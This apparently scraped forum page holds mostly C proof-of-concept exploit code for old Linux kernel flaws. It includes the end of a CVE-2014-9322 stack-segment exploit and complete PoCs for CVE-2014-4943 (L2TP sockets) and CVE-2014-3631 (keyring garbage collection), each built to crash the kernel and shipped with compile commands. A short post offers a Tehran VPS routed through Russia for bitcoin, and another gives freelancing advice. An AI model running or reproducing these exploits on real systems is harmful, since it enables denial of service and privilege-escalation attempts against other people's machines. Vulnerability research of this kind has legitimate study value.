main() { pthread_t thread1; uint8_t *code; printf("[cve_2014_9322]: Preparing to exploit.\n"); // map area for false SS code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0); if (code != (uint8_t *) FALSE_SS_BASE) { fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE); return -1; } printf("[cve_2014_9322]: Panic!\n"); if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0) { perror("[cve_2014_9322 error]: pthread_create"); return false; } // Wait for segManipulatorThread to create new stack segment sleep(1); // Set stack segment to newly created one in segManipulatorThread asm volatile ("mov %0, %%ss;" : :"r" (0x97) ); while(FLAG == 0){}; sleep(4); return 0; } #endif // __x86_64__ Source
  21. /* ---------------------------------------------------------------------------------------------------- * cve-2014-4943_poc.c * * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure * differences between an l2tp socket and an inet socket. * * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic. * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges. * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland. * If seems guys at immunuty found a way using race condition. * * * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c * * Emeric Nasi - www.sevagas.com *-----------------------------------------------------------------------------------------------------*/ /* ----------------------- Includes ----------------------------*/ #include <netinet/ip.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/mman.h> #include <linux/net.h> #include <linux/udp.h> #include <linux/if.h> #include <linux/if_pppox.h> #include <linux/if_pppol2tp.h> /* ----------------------- Definitions ----------------------------*/ #define TARGET_KERNEL_MIN "3.2.0" #define TARGET_KERNEL_MAX "3.15.6" #define EXPLOIT_NAME "cve-2014-4943" /* ----------------------- functions ----------------------------*/ /** * It is possible to modify several parts of socket object using IP options frop UDP setsockopt * For this POC, IP_OPTIONS is the easiest way to panic kernel */ void modifyUDPvalues(int tunnel_fd) { /* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability: int udp_setsockopt(struct sock *sk, int level, int optname, char __user *optval, unsigned int optlen) { if (level == SOL_UDP || level == SOL_UDPLITE) return udp_lib_setsockopt(sk, level, optname, optval, optlen, udp_push_pending_frames); return ip_setsockopt(sk, level, optname, optval, optlen); } */ int ip_options = 0x1; if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1) { perror("setsockopt (IP_OPTIONS)"); } } /** * DOS poc for cve_2014_4943 vulnerability */ int main() { int tunnel_fd; int tunnel_fd2; int udp_fd; printf("[cve_2014_4943]: Preparing to exploit.\n"); /* Create first L2TP socket */ tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (tunnel_fd < 0) { perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)"); return -1; } /* Create second L2TP socket */ tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (tunnel_fd2 < 0) { perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)"); return -1; } if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("cannot create socket"); return -1; } /* Connect LT2P socket */ struct sockaddr_pppol2tp sax; memset(&sax, 0, sizeof(sax)); sax.sa_family = AF_PPPOX; sax.sa_protocol = PX_PROTO_OL2TP; sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */ sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr; sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port; sax.pppol2tp.addr.sin_family = AF_INET; sax.pppol2tp.s_tunnel = 8;//tunnel_id; sax.pppol2tp.s_session = 0; /* special case: mgmt socket */ sax.pppol2tp.d_tunnel = 0; sax.pppol2tp.d_session = 0; /* special case: mgmt socket */ if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 ) { perror("connect failed"); } /* Connect LT2P socket */ struct sockaddr_pppol2tp sax2; memset(&sax, 0, sizeof(sax2)); sax2.sa_family = AF_PPPOX; sax2.sa_protocol = PX_PROTO_OL2TP; sax2.pppol2tp.s_tunnel = 8;//tunnel_id; sax2.pppol2tp.s_session = 1; sax2.pppol2tp.d_tunnel = 0; sax2.pppol2tp.d_session = 1; if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 ) { perror("connect failed"); } /* * Entering critical part */ printf("[cve_2014_4943]: Panic!\n"); //modifyUDPvalues(tunnel_fd); modifyUDPvalues(tunnel_fd2); // close opened socket puts("\n [+] Closing sockets..."); close(tunnel_fd); close(tunnel_fd2); exit(0); } Source
  22. /* ---------------------------------------------------------------------------------------------------- * cve-2014-3631_poc.c * * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation. * * * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic. * * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c -lkeyutils * * * Emeric Nasi - www.sevagas.com *-----------------------------------------------------------------------------------------------------*/ /* ----------------------- Includes ----------------------------*/ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <inttypes.h> #include <keyutils.h> #include <fcntl.h> #define TARGET_KERNEL_MIN "3.13.0" #define TARGET_KERNEL_MAX "3.16.2" #define EXPLOIT_NAME "cve-2014-3631" #define EXPLOIT_TYPE DOS /* ----------------------- functions ----------------------------*/ /** * Poc for cve_2014_3631 vulnerability */ int main() { key_serial_t currentKey = 0; key_serial_t topKey = 0; int i = 0; int fp; char kname[16]={0}; char gc_delay[16] = {0}; int delay =0; printf("[cve_2014_3631]: Preparing to exploit.\n"); // fetch garbage collector value.. fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY); if(fp == -1) { printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n"); delay = 300; } else { read(fp,gc_delay,sizeof(gc_delay-1)); delay = atoi(gc_delay); close(fp); } // Add top key topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING); if(topKey == -1) { printf("[cve_2014_3631 error]: keyring fault\n"); perror("add_key"); return -1; } // Add 18 keys to top key for(i=0; i< 18; i++) { memset(kname,00,sizeof(kname)); memcpy(kname,"Lvl2K_",strlen("Lvl2K_")); sprintf(kname+strlen("Lvl2K_"),"%d",i); currentKey = add_key("keyring",kname,NULL,0,topKey); if(currentKey == -1) { printf("[cve_2014_3631 error]: keyring fault\n"); perror("add_key"); return -1; } } /* Entering exploit critical code */ printf("[cve_2014_3631]: Exploit!\n"); // Set timeout and wait for garbage collector keyctl_set_timeout(currentKey, 2); // Wait for garbage collector printf("[cve_2014_3631]: Exploit triggered, system will panic in %d seconds..\n",delay); return 0; } Source
  23. Vand VPS Linux in Teheran, Iran OS: Linux ( la alegere ) Bandwidth: 10GB/luna: ip Teheran, Iran, trafic routat prin Rusia. HDD: 15GB RAM: 384Mb Pret: 0.9 BTC / an Bandwidth, HDD si RAM se pot mari contra cost. Cine e interesat sa imi lase PM!
  24. @Terchea freelancer[dot]com daca te pui sa inveti sigur o sa faci banii frumosi.
×
×
  • Create New...